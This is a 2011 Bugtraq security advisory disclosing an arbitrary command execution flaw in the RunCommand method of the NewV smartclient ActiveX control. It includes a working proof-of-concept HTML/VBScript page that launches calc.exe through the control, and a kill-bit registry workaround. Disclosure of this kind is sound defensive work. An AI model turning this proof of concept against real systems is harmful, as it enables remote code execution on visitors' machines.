[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201101100756.p0A7uLg3029543@www3.securityfocus.com>
Date: Mon, 10 Jan 2011 00:56:21 -0700
From: yuguo.cn@...il.com
To: bugtraq@...urityfocus.com
Subject: NewV: NewvCommon.ocx arbitrary command execution via the
Runcommand attribute
Vendor: NewV ( http:// www.newv.com.cn/ )
Product: NewV smartclient
(http://demo.newv.com.cn/lds/module/smartclientsetting.exe)
Vulnerable Version: 1.0.0.18
Status: Not Fixed, Vendor Alerted
Risk level: High
Credit: Yu Guo(yuguo.cn#gmail.com)
Description:
An input validation issue exists in the NewV ActiveX Control.
The Runcommand attribute may allow attacker to run arbitrary command remotely.
POC:
<html>
<head>
<script language='vbscript'>
arg1 = "calc.exe"
</script>
</head>
<object classid='clsid:0B68B7EB-02FF-4A41-BC14-3C303BB853F9' id='target' />
</object>
<script language='vbscript'>
target.RunCommand arg1
</script>
</html>
Workaround:
Set the Killbit for NewV CLSID’s:
{0B68B7EB-02FF-4A41-BC14-3C303BB853F9}
.Reg file:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\ActiveX Compatibility\{0B68B7EB-02FF-4A41-BC14-3C303BB853F9}]
"Compatibility Flags"=dword:00000400
-EOF-
Powered by blists - more mailing lists